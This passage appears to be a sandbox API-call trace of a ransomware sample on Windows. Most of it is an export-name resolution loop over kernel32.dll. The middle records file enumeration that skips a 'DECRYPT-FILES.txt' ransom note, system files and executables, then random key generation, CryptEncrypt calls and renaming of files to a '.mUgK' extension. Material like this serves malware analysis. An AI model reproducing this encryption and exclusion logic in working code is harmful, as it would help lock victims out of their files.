returned="DeleteTimerQueueEx" [0082.487] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.487] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.487] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.487] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.487] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.487] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.487] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.488] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.488] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.488] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.488] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.488] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.488] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.488] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.488] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.488] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.488] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.488] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.488] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.488] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.488] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.488] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.488] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.488] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.488] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.488] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.489] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.489] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.489] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.489] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.489] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.489] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.490] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uKAYm0ioy0dRtlDj-.jpg") returned 67 [0082.490] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uKAYm0ioy0dRtlDj-.jpg.mUgK") returned 72 [0082.490] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uKAYm0ioy0dRtlDj-.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ukaym0ioy0drtldj-.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uKAYm0ioy0dRtlDj-.jpg.mUgK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ukaym0ioy0drtldj-.jpg.mugk"), dwFlags=0x0) returned 1 [0082.490] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.491] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.491] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.491] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac3a42d0, ftCreationTime.dwHighDateTime=0x1d4d32f, ftLastAccessTime.dwLowDateTime=0xf6d460, ftLastAccessTime.dwHighDateTime=0x1d4cc3b, ftLastWriteTime.dwLowDateTime=0xf6d460, ftLastWriteTime.dwHighDateTime=0x1d4cc3b, nFileSizeHigh=0x0, nFileSizeLow=0xa0e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="uM20gJ1uzhQ3_i.pps", cAlternateFileName="UM20GJ~1.PPS")) returned 1 [0082.491] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps", lpString2="DECRYPT-FILES.txt") returned 1 [0082.491] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps", lpString2="autorun.inf") returned 1 [0082.491] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps", lpString2="boot.ini") returned 1 [0082.491] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps", lpString2="desktop.ini") returned 1 [0082.491] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps", lpString2="ntuser.dat") returned 1 [0082.491] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps", lpString2="iconcache.db") returned 1 [0082.491] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps", lpString2="bootsect.bak") returned 1 [0082.491] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps", lpString2="ntuser.dat.log") returned 1 [0082.491] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps", lpString2="thumbs.db") returned 1 [0082.491] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps", lpString2="Bootfont.bin") returned 1 [0082.491] lstrlenW (lpString="uM20gJ1uzhQ3_i.pps") returned 18 [0082.491] lstrcmpiW (lpString1="pps", lpString2="lnk") returned 1 [0082.491] lstrcmpiW (lpString1="pps", lpString2="exe") returned 1 [0082.491] lstrcmpiW (lpString1="pps", lpString2="sys") returned -1 [0082.491] lstrcmpiW (lpString1="pps", lpString2="dll") returned 1 [0082.491] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0082.492] lstrlenW (lpString="uM20gJ1uzhQ3_i.pps") returned 18 [0082.492] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0082.492] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="uM20gJ1uzhQ3_i.pps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uM20gJ1uzhQ3_i.pps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uM20gJ1uzhQ3_i.pps" [0082.492] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.492] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uM20gJ1uzhQ3_i.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\um20gj1uzhq3_i.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0082.492] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=41188) returned 1 [0082.492] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0082.492] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.492] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.492] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.492] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.493] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0082.493] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.494] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.494] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.495] CloseHandle (hObject=0x444) returned 1 [0082.495] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.495] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0082.495] CloseHandle (hObject=0x0) returned 0 [0082.495] CloseHandle (hObject=0x440) returned 1 [0082.496] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.496] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.496] GetTickCount () returned 0x114d192 [0082.496] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.496] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.496] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.497] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.497] lstrlenA (lpString="kernel32.dll") returned 12 [0082.497] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.497] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.497] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.497] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.497] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.497] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.497] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.497] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.497] lstrlenA (lpString="ADDATOMA") returned 8 [0082.497] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.497] lstrlenA (lpString="ADDATOMW") returned 8 [0082.497] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.497] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.497] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.497] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.497] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.497] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.498] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.498] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.498] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.498] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.498] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.498] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.498] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.498] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.498] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.498] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.498] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.498] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.498] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.498] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.498] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.498] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.498] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.498] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.498] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.499] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.499] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.499] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.499] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.499] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.499] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.499] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.499] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.499] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.499] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.499] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.499] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.499] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.499] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.499] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.499] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.499] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.499] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.499] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.499] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.499] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.499] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.499] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.499] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.499] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.499] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.499] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.499] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.499] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.499] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.499] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.499] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.499] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.499] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.499] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.499] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.500] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.500] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.500] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.500] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.500] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.500] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.500] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.500] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.500] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.500] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.500] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.500] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.500] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.500] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.500] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.500] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.500] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.500] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" 